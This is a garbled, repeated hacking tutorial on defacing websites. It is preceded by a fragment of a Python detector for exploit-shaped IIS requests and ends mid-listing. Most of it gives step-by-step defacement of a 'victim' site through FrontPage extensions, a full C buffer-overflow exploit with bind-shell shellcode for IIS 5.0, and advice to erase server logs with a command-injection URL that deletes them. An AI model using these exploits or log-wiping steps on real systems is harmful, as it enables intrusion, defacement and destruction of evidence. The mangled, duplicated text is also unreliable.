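    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:end].split(b";")[0], 16)    # ValueError if the size is not hex
        pos = end + 2
        if size == 0:
            break
        chunks.append(body[pos:pos + size])
        pos += size + 2                                  # skip the data and its CRLF
    return chunks


def inspect_request(raw: bytes) -> List[Finding]:
    """Return the rules the request trips; an empty list means nothing matched."""
    findings: List[Finding] = []
    try:
        method, target, _, headers, body = parse_request(raw)
    except ValueError as exc:
        return [Finding("malformed-request", str(exc))]
    if len(target) > MAX_TARGET_LEN:
        findings.append(Finding("long-request-target", f"{len(target)} bytes"))
    if NOP_RUN.search(target):
        findings.append(Finding("nop-sled-in-target", "run of 0x90 bytes in the URL"))
    binary = sum(1 for b in target if b not in PRINTABLE)
    if binary:
        findings.append(Finding("binary-bytes-in-target", f"{binary} non-printable bytes"))
    if method == b"POST" and headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        try:
            chunks = parse_chunks(body)
        except ValueError as exc:
            findings.append(Finding("malformed-chunked-body", str(exc)))
            return findings
        # A form-urlencoded body is printable by definition, so binary chunks (the listing's
        # 0xcc/0x02 pad and its two 4-byte addresses) have no business there.
        if headers.get(b"content-type", b"").startswith(b"application/x-www-form-urlencoded"):
            if any(b not in PRINTABLE for chunk in chunks for b in chunk):
                findings.append(Finding("binary-chunked-body", f"{len(chunks)} chunks"))
    return findings


# Constructed samples. The first copies the listing's request shape with NOPs and two 0xcc
# bytes standing in for shellcode; AAAA/BBBB sit where the listing writes its two addresses.
EXPLOIT_SHAPED = (
    b"POST /iisstart.asp" + b"\x90" * 4096 + b"\xcc\xcc" +
    b" HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"10\r\n" + b"\xcc" * 4 + b"ADPA" + b"\x02" * 4 + b"PADP" + b"\r\n"
    b"4\r\nAAAA\r\n"
    b"4\r\nBBBB\r\n"
    b"0\r\n\r\n\r\n"
)
BENIGN_FORM = (b"POST /login.asp HTTP/1.1\r\nHost: 192.0.2.10\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 18\r\n\r\nuser=bob&pw=hunter")
BENIGN_CHUNKED = (b"POST /form.asp HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\n"
                  b"a\r\nuser=alice\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("exploit-shaped", EXPLOIT_SHAPED), ("form", BENIGN_FORM), ("chunked", BENIGN_CHUNKED)):
        print(name, [f.rule for f in inspect_request(req)])
```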

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Even government websites are defaced, for different reasons; the most common reason is cyber war. Just as in the real world there are wars between rival countries, in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all, you must organize your web root with suitable directories. What I mean is that you must organize your files: images in an image directory, one directory for server-side content, and so on. If you don't configure your web root properly, your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com

http://www.packetstorm.org

http://www.guininski.com

http://www.insecure.org

http://www.securiteam.com

http://www.slashdot.org

http://www.technotronic.com

Every web server is vulnerable, but you must not fear: download the latest patches for the particular vulnerability.

The last thing is that you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker to root the cracker out.

So this completes my tutorial on defacing websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 13: Defacing Website

Working with Exploits

Well I must say this is the most exciting part of this tutorial

Okay so wwwvictimcom is the target site Well through the

above methods I mean the methods I have explained earlier in

the tutorial through those methods we have found out that the

website is functioning in Microsoft IIS server software So it is

time to find some vulnerability I am using Acutenix Web Security

Scanner to scan for vulnerabilities You guys must know

programming languages like Perl or Socket Programming or C this

is essential because through this you will be able to compile the

exploits So once you get vulnerability try exploiting it by

executing it in your client (browser)

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft

Web Publishing Wizard Using this method one can deface

Websites having FrontPage Server extensions By using Microsoft

Web Publishing Wizard one can replace FrontPage Server

extension pages

Follow the steps given below to execute the following exploit

Telnet the Target website or web server in port 80

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 14: Defacing Website

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

/*
   Windows 2000 Server Exploit By CHINANSL Security Team
   Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
   Warning: THIS PROGRAM WILL ONLY TEST!
   CHINANSL Technology CO., LTD   http://www.chinansl.com
   keji@chinansl.com

   Use MS VC++ to compile this piece of code (as a .cpp file: declarations
   after statements and the stdafx.h precompiled header assume C++).

   Editor's note: the listing had lost its backslash escapes, quotes,
   semicolons and braces in extraction; they are restored here without
   changing the logic.  The first request fragment (s1) is the bare method,
   which is what the sprintf() format below requires.  The bug is the
   chunked-encoding heap overflow in the IIS 5.0 ASP handler (Microsoft
   bulletin MS02-018, April 2002).  Every address in the program is for the
   Chinese build of Windows 2000 it was tested on.
*/
#include "stdafx.h"          /* VC++ precompiled header; drop it if you do not use one */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib, "Ws2_32")

int main(int argc, char* argv[])
{
    if (argc != 4)
    {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    /* value written over the first 4-byte chunk ("AAAA") */
    DWORD srcdata = 0x01e2fb1c - 4;   // 0x00457474;
    /* address of SHELLCODE, written over the second 4-byte chunk ("BBBB") */
    DWORD jmpaddr = 0x00457494;       // 0x77ebf094;  0x01e6fcec;
    // "\x1c\xfb\xe6\x01";  "\x0c\xfb\xe6\x01";

    char* destIP = argv[1];
    char* destFile = argv[3];
    int webport = atoi(argv[2]);

    /* the 16-byte first chunk; the split literals keep "ADPA" out of the \xcc escape */
    char* pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   // 16 bytes

    WSADATA ws;
    SOCKET s;
    long result = 0;
    if (WSAStartup(0x0101, &ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];

    /* Bind shell.  It loads kernel32 and wsock32 through the hardcoded
       LoadLibraryA (0x77e78023) and GetProcAddress (0x77e7564b) of the
       Chinese Win2k build, resolves wsock32 exports by ordinal (socket=23,
       bind=2, listen=13, accept=1, send=19, recv=16, closesocket=3), listens
       on port 1111 (0x0457 in network order), accepts one connection and runs
       "cmd" with its standard handles tied to it through pipes. */
    char* shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
